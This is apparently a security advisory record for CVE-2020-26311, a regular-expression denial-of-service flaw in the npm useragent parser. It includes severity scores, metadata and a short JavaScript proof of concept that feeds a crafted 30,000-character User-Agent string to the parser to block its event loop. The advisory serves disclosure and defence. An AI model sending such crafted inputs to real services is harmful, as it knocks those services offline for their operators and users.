CVE-2020-26311 – useragent
Package
Manager: npm
Name: useragent
Vulnerable Version: >=0 <=2.3.0
Severity
Level: Medium
CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U/U:Green
EPSS: 0.00261 (percentile 0.4929)
Details
useragent Regular Expression Denial of Service vulnerability
Useragent is a user agent parser for Node.js. All versions as of the time of publication contain one or more regular expressions that are vulnerable to Regular Expression Denial of Service (ReDoS): a crafted User-Agent value forces the parser's regex engine into catastrophic backtracking, so CPU time grows superlinearly with input length and the event loop of the parsing process is blocked.
PoC
```js
async function exploit() {
  const useragent = require("useragent");

  // Create a malicious user-agent that leads to excessive backtracking:
  // a long run of characters inside the platform parentheses.
  const maliciousUserAgent =
    'Mozilla/5.0 (' + 'X'.repeat(30000) + ') Gecko/20100101 Firefox/77.0';

  // Parse the malicious user-agent
  const agent = useragent.parse(maliciousUserAgent);

  // Call the toString method to trigger the vulnerability
  const result = await agent.device.toString();
  console.log(result);
}

// Invoked as a plain call so the script runs as CommonJS (top-level await
// is not available in a module that uses require()).
exploit();
```
Metadata
Created: 2024-10-26T21:30:47Z
Modified: 2025-09-03T15:17:53Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/10/GHSA-mgfv-m47x-4wqp/GHSA-mgfv-m47x-4wqp.json
CWE IDs: ["CWE-1333"]
Alternative ID: GHSA-mgfv-m47x-4wqp
Finding: F211
Auto approve: 1